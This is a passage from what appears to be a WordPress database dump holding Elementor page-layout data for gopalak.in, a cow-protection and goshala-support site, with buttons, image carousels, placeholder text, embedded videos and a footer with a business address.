Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10457,1743,'_elementor_page_assets','a:0:{}'),(10459,1744,'_elementor_edit_mode','builder'),(10460,1744,'_elementor_template_type','wp-page'),(10461,1744,'_elementor_version','3.7.8'),(10462,1744,'_wp_page_template','elementor_canvas'),(10463,1744,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\